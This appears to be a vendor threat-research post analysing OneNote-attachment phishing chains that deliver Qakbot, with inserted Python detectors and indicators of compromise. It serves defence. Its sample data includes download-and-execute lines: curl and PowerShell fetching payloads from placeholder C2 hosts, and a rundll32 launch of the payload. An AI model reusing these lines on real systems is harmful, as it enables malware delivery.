The Adventures of Malicious OneNote Attachments in Cortex XDR Land

Jul 05, 2023

Executive Summary

The Cortex Threat Research team has been tracking recent campaigns that used malicious OneNote email attachments as the initial attack vector. Malicious OneNote files were popularized by various threat actors earlier this year, in response to Microsoft blocking macros in files downloaded from the internet by default.

Following Microsoft’s notice, starting in early 2023, infected OneNote attachments have been seen spreading malware such as Emotet, Qakbot and AsyncRAT, to name a few.

Similar to attacks delivering malicious Word macro attachments, emails with various themes were sent at scale, luring potential victims into downloading an attached malicious OneNote file.

OneNote itself is installed by default as part of various versions of Microsoft Office installations, and allows embedding of macros.

Microsoft released another notice in April, stating that 120 file extensions will be blocked by default in OneNote, which blocks the user from interacting with such embedded files entirely. These changes began rolling out with OneNote Version 2304 in April 2023, but for all users who have not yet updated, this attack vector remains prevalent.

We observed multiple malware delivery techniques in the different campaigns, using various script types that serve as loaders, such as CScript and WScript, as well as HTA files run via MSHTA.

This writeup will examine some of the more salient techniques and provide insights on how Cortex XDR detects and blocks the infection chains derived from each file.

Initial Access and Structure

The initial access vector of OneNote malicious attachments consists of the “good old” method of luring the victim into opening an email containing a malicious attachment.

In the example below, we can see a targeted fake reply to an existing correspondence, presented as an urgent matter in order to pressure the victim into opening the attached file. This email was part of a larger phishing campaign that targeted Italian-speaking users.

Figure 1. An email containing a malicious OneNote attachment

These malicious documents often feature intentionally blurred content, accompanied by a message that prompts the user to press a button with the promise of unblurring the content. Pressing the button runs the malicious macro and ultimately triggers the infection chain.

The screenshot below depicts a malicious document that is pretending to be protected by a “security signature” of Microsoft Azure Cloud.

Figure 2. The content of the aforementioned OneNote malicious attachment

Extracting the embedded resources shows that these are all in fact just images, including the blurred “document” in the background. It is also interesting to note that the default names of the extracted image resources are in Russian and simply mean “unnamed painting”.

Figure 3. The images resources extracted from the OneNote file

Another example shows a decoy email in German. This shows how widespread these attacks are, targeting potential victims in multiple countries.

Figure 4. Content of the lure email

After opening the attached document, a window using the Office 365 theme appears, prompting the user to download a document allegedly hosted on the cloud.

Figure 5. Another example of a malicious document content

The content of this document carries a malicious HTA file. After the user clicks on the “Open” button, they unknowingly execute the HTA file, and the JavaScript embedded in it creates a fake popup message. The fake popup diverts the user’s attention from the fact that a malicious script is running in the background.

Figure 6. The fake message displayed while malicious code is running in the background

MSI Installer Variant

Once a user is successfully lured into clicking the aforementioned button, an MSI file is launched, which bundles a malicious Windows script file. Upon installation of the MSI file, the Windows script file is written to disk and then executed by the WScript engine.

Using the UniExtract2 tool, it is possible to extract the Windows script file bundled in the installation package.

Figure 7. Contents of the MSI installer

The extracted script file is obfuscated and contains junk code. Parts of the script are also scattered between benign text, such as excerpts from “Alice in Wonderland”.

Figure 8. Contents of the Windows script including a benign text from Alice in Wonderland

By breaking the script into pieces and embedding them in large benign text files, the attackers attempt to thwart analysis efforts and evade detection by AV solutions.

The Windows script eventually drops two further scripts on disk, in the %programdata% folder.

Figure 9. Names of the two script files that are being dropped on disk

The scripts are executed in the background while the victim thinks they are installing Azure cloud software.

Figure 10. Content of the two script files dropped on disk

The content of these two additional scripts, prior to being written to disk, is embedded in hex-encoded form in the Windows script file. Two strings are especially noticeable.

Decoding the first hex-encoded string reveals the code below, which downloads a file from a remote command and control (C2) server and saves it to disk.

Figure 11. Content of the first decoded hex string

Decoding the second hex-encoded string reveals another piece of code, responsible for executing the previously downloaded file through its exported function, “Motd”, using the Windows built-in Rundll32 binary. This indicates that the dropped file is actually a DLL, rather than a .tmp file as the name would suggest.

Figure 12. Content of the second decoded hex string

The final payload is the well-established Qakbot malware, an information stealer and formerly a banking Trojan, which has been around since at least 2007.

The execution of the MSI installer was detected and prevented by Cortex XDR, as seen in the screenshots below.

Figure 13. The MSI installer process tree as seen in Cortex XDR in detect mode

Figure 14. The MSI installer process tree as seen in Cortex XDR in prevent mode

HTA File Variant

We observed another infection method using OneNote in a campaign that targeted German-speaking users. In this campaign, instead of an MSI installer, the attackers used an HTML Application (HTA) file.

The HTA file’s content is much shorter than the Windows script of the MSI variant, but it still contains obfuscated strings. The main string in its obfuscated form is depicted below.

Figure 15. Obfuscated content of the HTA file

Deobfuscating this string returns the following script, which reveals the main malicious functionality.

Figure 16. Deobfuscated content of the HTA file

This part of the script shows the usage of the curl utility to download a payload to disk, masquerading it as a PNG file. The script then proceeds to display the fake pop-up message claiming that the document is corrupted, as depicted in the “Initial Access” section.

After the deobfuscation, the script content is written to the registry, under the key HKCU\SOFTWARE\rq5w\xczis\x4dyhu.

Finally, the freshly written value is read back from the registry, and if it exists, the part of the script shown below passes it as the URL parameter to the curl utility to download the malicious payload. The registry value is then deleted.

Figure 17. The C2 URL as seen in the HTA file
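The write, read and delete pattern described above, in which the script parks its content in a registry value, uses it once and removes it, is worth alerting on independently of the specific key name. The following Python is an added example (it is neither Cortex XDR’s own logic nor code from the samples): it correlates registry-set, registry-delete and process-creation events by the process that performed them and flags a script host whose value lived only briefly while that host spawned a child process. The event format, the timestamps, the curl command line and the host c2.example.invalid are constructed; the registry path is the one named in this post.

```python
from datetime import datetime, timedelta

# Script hosts whose short-lived registry values are suspicious.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}

# Constructed telemetry (not real sensor output). The registry path is the one
# quoted in the post; the process ids, times and host name are made up.
SAMPLE_EVENTS = [
    {"ts": "2023-06-01T10:00:00", "type": "process", "pid": 600, "ppid": 200,
     "image": "mshta.exe"},
    {"ts": "2023-06-01T10:00:01", "type": "reg_set", "pid": 600, "image": "mshta.exe",
     "path": r"HKCU\SOFTWARE\rq5w\xczis\x4dyhu"},
    {"ts": "2023-06-01T10:00:02", "type": "process", "pid": 700, "ppid": 600,
     "image": "curl.exe",
     "cmdline": r"curl.exe -o C:\Users\Public\doc.png http://c2.example.invalid/x"},
    {"ts": "2023-06-01T10:00:03", "type": "reg_delete", "pid": 600, "image": "mshta.exe",
     "path": r"HKCU\SOFTWARE\rq5w\xczis\x4dyhu"},
    # Benign: an installer writes a version value and leaves it in place.
    {"ts": "2023-06-01T10:05:00", "type": "reg_set", "pid": 900, "image": "setup.exe",
     "path": r"HKCU\SOFTWARE\Vendor\App\Version"},
    # Benign: a logon script cleans up its own value but spawns nothing meanwhile.
    {"ts": "2023-06-01T10:06:00", "type": "reg_set", "pid": 950, "image": "wscript.exe",
     "path": r"HKCU\SOFTWARE\Vendor\Login\State"},
    {"ts": "2023-06-01T10:06:01", "type": "reg_delete", "pid": 950, "image": "wscript.exe",
     "path": r"HKCU\SOFTWARE\Vendor\Login\State"},
]


def _t(ev):
    return datetime.fromisoformat(ev["ts"])


def find_registry_staging(events, window_seconds=60):
    """Flag a script host that sets a value, spawns a child, then deletes the
    same value within the window. Returns one alert per such sequence."""
    alerts = []
    evs = sorted(events, key=_t)
    for i, s in enumerate(evs):
        if s["type"] != "reg_set" or s["image"].lower() not in SCRIPT_HOSTS:
            continue
        deadline = _t(s) + timedelta(seconds=window_seconds)
        children = []
        for later in evs[i + 1:]:
            if _t(later) > deadline:
                break
            # Children launched by the same process while the value exists.
            if later["type"] == "process" and later.get("ppid") == s["pid"]:
                children.append(later["image"])
            # The value is removed again by the process that created it.
            if (later["type"] == "reg_delete" and later["pid"] == s["pid"]
                    and later["path"] == s["path"]):
                if children:
                    alerts.append({
                        "pid": s["pid"], "image": s["image"], "path": s["path"],
                        "lifetime_s": (_t(later) - _t(s)).total_seconds(),
                        "children": children,
                    })
                break
    return alerts


if __name__ == "__main__":
    for a in find_registry_staging(SAMPLE_EVENTS):
        print(a)
```

The benign wscript.exe sequence is deliberately left unflagged because nothing was spawned while its value existed; tightening that to "any short-lived value written by a script host" is a reasonable choice on hosts where script-driven configuration is rare.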

Cortex XDR detected and prevented the execution of the mshta.exe file, as seen in the screenshots below.

Figure 18. The HTA file execution as seen in Cortex XDR in detect mode

Figure 19. The HTA file execution as seen in Cortex XDR in prevent mode

ISO + CHM Variant

We observed a third infection scenario that is an interesting combination of a bundled ISO image containing a CHM file. The theme of the document resembles the examples above. When the user clicks on the “Open” button, the ISO image that contains the CHM file is mounted.

Figure 20. The ISO image that is mounted on the user’s PC

After extracting the ISO file and the contents of the CHM file, we see that the CHM file contains an additional command line that is executed on click.

Figure 21. Content of the CHM file

The Base64-encoded command line decodes to the PowerShell code shown in Figure 22, which includes the command start rundll32 $env:TEMP\PebbliestUndetractive.capriote, Motd;.

This time the attackers embedded an array of C2 servers, running in a loop, waiting for a successful connection in order to download and execute the Qakbot payload.

Figure 22. Base64 decoded PowerShell command
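Both the MSI variant’s Windows script (the hex-encoded strings of Figures 11 and 12) and this CHM’s PowerShell (Base64 over UTF-16LE text, the form PowerShell’s -EncodedCommand expects) hide the download and the rundll32 call behind a trivial encoding, so a small decoder recovers the indicators without running anything. The following Python is an added example, not code from this post or from the samples: it pulls out long hex literals and -EncodedCommand arguments, decodes them, and extracts URLs and rundll32 path/export pairs from the result. The two inputs it runs on are constructed stand-ins (placeholder .invalid hosts and a get()/run() pseudo-API in the hex strings); the rundll32 command is the one quoted above.

```python
import base64
import re

# --- Constructed samples (not the post's malware) ---------------------------
# Stand-in for the obfuscated Windows script: junk prose around two hex-encoded
# strings mirroring the download stub and the rundll32 launcher described above.
# get()/run() are placeholders, and the host is an RFC 2606 .invalid name.
_STUB_DOWNLOAD = 'u="http://c2.example.invalid/file.tmp";o="C:\\ProgramData\\file.tmp";get(u,o);'
_STUB_LAUNCH = 'run("rundll32 C:\\ProgramData\\file.tmp, Motd");'
SAMPLE_WSF = (
    'var junk = "Alice was beginning to get very tired of sitting by her sister";\n'
    'var a = "' + _STUB_DOWNLOAD.encode().hex() + '";\n'
    'var b = "' + _STUB_LAUNCH.encode().hex() + '";\n'
)

# Stand-in for the CHM command line: a C2 array tried in a loop, then rundll32.
_PS = (
    '$hosts=@("http://c2-a.example.invalid/f.png","http://c2-b.example.invalid/f.png");'
    'foreach($u in $hosts){try{iwr $u -OutFile $env:TEMP\\PebbliestUndetractive.capriote;break}catch{}};'
    'start rundll32 $env:TEMP\\PebbliestUndetractive.capriote, Motd;'
)
SAMPLE_CHM_CMD = ("powershell.exe -EncodedCommand "
                  + base64.b64encode(_PS.encode("utf-16le")).decode())

# --- Decoding and extraction --------------------------------------------------
HEX_RE = re.compile(r'(?<![0-9A-Za-z])([0-9A-Fa-f]{32,})(?![0-9A-Za-z])')
ENC_RE = re.compile(r'-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})', re.I)
URL_RE = re.compile(r'https?://[^\s"\'<>()]+')
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+([^\s,]+)\s*,\s*(\w+)', re.I)


def decode_hex_strings(text):
    """Decode every long, even-length hex literal in the script body."""
    out = []
    for h in HEX_RE.findall(text):
        if len(h) % 2:
            continue
        out.append(bytes.fromhex(h).decode("utf-8", errors="replace"))
    return out


def decode_encoded_commands(text):
    """Decode PowerShell -EncodedCommand arguments (Base64 of UTF-16LE)."""
    out = []
    for b in ENC_RE.findall(text):
        raw = base64.b64decode(b + "=" * (-len(b) % 4))
        out.append(raw.decode("utf-16le", errors="replace"))
    return out


def triage(text):
    """Return decoded layers plus the URLs and rundll32 (path, export) pairs
    found in the raw text and in every decoded layer."""
    decoded = decode_hex_strings(text) + decode_encoded_commands(text)
    urls, rundll = [], []
    for blob in [text] + decoded:
        urls += URL_RE.findall(blob)
        rundll += RUNDLL_RE.findall(blob)
    return {"decoded": decoded,
            "urls": sorted(set(urls)),
            "rundll32": sorted(set(rundll))}


if __name__ == "__main__":
    for name, sample in (("wsf", SAMPLE_WSF), ("chm", SAMPLE_CHM_CMD)):
        r = triage(sample)
        print(name, r["urls"], r["rundll32"])
```

A rundll32 invocation whose DLL path carries a non-DLL extension (.tmp, .capriote) and a URL whose file name ends in .png are exactly the mismatches the post describes, and both fall out of the decoded layers here.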

Cortex XDR detected and prevented the execution of the CHM file, as seen in the screenshots below.

Figure 23. The CHM file execution tree as seen in Cortex XDR in detect mode

Figure 24. The CHM file execution tree as seen in Cortex XDR in prevent mode

Protections and Mitigations

Cortex XDR customers are protected against the different variations of infection chains using malicious OneNote attachments. Each scenario described above, together with its infection chain, is detected and blocked by the Cortex XDR platform, as the respective detection and prevention screenshots show.
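All three chains above start from the same parent: the user-facing OneNote process spawns an installer, script host or help viewer, which then reaches rundll32, curl or PowerShell. As an added example (not Cortex XDR’s own detection logic), the following Python reconstructs process lineage from process-creation events and flags any such host, or any of its descendants, that sits under onenote.exe, labelling the chain with the variant it matches. The events, paths and host names are constructed; hh.exe as the CHM viewer is an assumption from general Windows knowledge rather than something this post states.

```python
# Images that are suspicious when they descend from OneNote.
SUSPICIOUS_CHILDREN = {
    "msiexec.exe", "wscript.exe", "cscript.exe", "mshta.exe", "hh.exe",
    "powershell.exe", "rundll32.exe", "curl.exe", "cmd.exe",
}

# Which variant from the post a given first hop under OneNote corresponds to.
VARIANT_BY_FIRST_HOP = {
    "msiexec.exe": "MSI installer variant",
    "wscript.exe": "MSI installer variant",
    "mshta.exe": "HTA file variant",
    "hh.exe": "ISO + CHM variant",
}

# Constructed process-creation events (not real sensor output); paths and the
# c2.example.invalid host are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "ONENOTE.EXE", "cmdline": "ONENOTE.EXE invoice.one"},
    # MSI installer variant: embedded MSI -> bundled Windows script -> rundll32 export
    {"pid": 300, "ppid": 200, "image": "msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\u\AppData\Local\Temp\setup.msi"},
    {"pid": 400, "ppid": 300, "image": "wscript.exe",
     "cmdline": r"wscript.exe C:\ProgramData\loader.wsf"},
    {"pid": 500, "ppid": 400, "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\file.tmp,Motd"},
    # HTA variant: mshta -> curl download masquerading as PNG
    {"pid": 600, "ppid": 200, "image": "mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\open.hta"},
    {"pid": 700, "ppid": 600, "image": "curl.exe",
     "cmdline": r"curl.exe -o C:\Users\Public\doc.png http://c2.example.invalid/x"},
    # ISO + CHM variant: HTML Help viewer (assumed hh.exe) -> encoded PowerShell -> rundll32
    {"pid": 800, "ppid": 200, "image": "hh.exe", "cmdline": r"hh.exe D:\document.chm"},
    {"pid": 900, "ppid": 800, "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand <b64>"},
    {"pid": 1000, "ppid": 900, "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Local\Temp\PebbliestUndetractive.capriote,Motd"},
    # Benign noise: a logon script under Explorer, and a print helper under OneNote
    {"pid": 1100, "ppid": 100, "image": "wscript.exe",
     "cmdline": r"wscript.exe \\fs\netlogon\map.vbs"},
    {"pid": 1200, "ppid": 200, "image": "splwow64.exe", "cmdline": "splwow64.exe 8192"},
]


def lineage(by_pid, pid):
    """Walk parents from pid upwards; returns [self, parent, grandparent, ...]."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(ev)
        pid = ev["ppid"]
    return chain


def detect(events):
    """Flag suspicious images anywhere below onenote.exe, with the variant label
    derived from the first hop directly under OneNote."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        images = [c["image"].lower() for c in lineage(by_pid, e["pid"])]
        if images[0] not in SUSPICIOUS_CHILDREN or "onenote.exe" not in images[1:]:
            continue
        first_hop = images[images.index("onenote.exe") - 1]
        alerts.append({
            "pid": e["pid"],
            "image": images[0],
            "variant": VARIANT_BY_FIRST_HOP.get(first_hop, "unknown OneNote child chain"),
            "chain": " -> ".join(reversed(images)),
        })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["pid"], a["variant"], a["chain"])
```

The rule keys on lineage rather than on file hashes, so it survives a re-packed MSI, a renamed HTA or a new C2 list; the trade-off is that any legitimate workflow launching msiexec or a script host from OneNote would need an explicit exclusion.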

In addition to the classic detections, the unique SmartScore engine translates security investigation methods and their associated data into an ML-driven hybrid risk scoring system. All three scenarios detailed in this blog scored higher than 95 out of 100 in SmartScore.

Figure 25. SmartScore results for the MSI installer variant incident

Indicators of Compromise

MSI Installer Variant

Email

a6f3ce007be6810ef4df88e97aca226666c904065f1a1215079be4570b941227

OneNote Attachment

66a8e8fd9f50632b86408434cad6cf7238f243f2bca7f601dc108a933174c017

C2 Domain

logswalker[.]com

MSI Installer

1ce9f46beb6336aee67c548ce11aed6a80ec6816d89a35ed0ca6def577932198

Windows Script

3c9aa9fc46d14bcd25da2bcae0a924b0840c6b067c889ba242f0840a9e72fbd3

HTA File Variant

Email

9210833cd360ba3af63f7108cfc406308c04b85bef5f35e4660e687c1c8db45d

OneNote Attachment

ccea71c3007664a78b34ee6ffd5237b7d3a24f6957a59f654154244160f44c53

HTA File

51b74094e47e5e4b8387a47924576872170ba7b0b0618f6ea0b36954ba1a4b0f

C2 IP

51.255.141[.]79

ISO + CHM Variant

OneNote Document

67febd5039bb69c26e12f3ca6e82b0478b0e98b8965c0a6119763335088b246a

ISO File

3efd4aac02a180f8d49ec63105802c44a39b5d2a584b35aed43be997e1e0d5d5

CHM File

6c5c936c65311794478b2c35ca51aa17473f647b2a88af51dceed5fbe60eece2

C2 Domains

nayadofoundation[.]org

mrcrizquna[.]com

gsscorporationltd[.]com

zainco[.]net

erg-eg[.]com

carladvogadatributaria[.]com

citytech-solutions[.]com

hotellosmirtos[.]com

Additional Resources

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rising-trend-of-onenote-documents-for-malware-delivery/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-1/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-2/

 

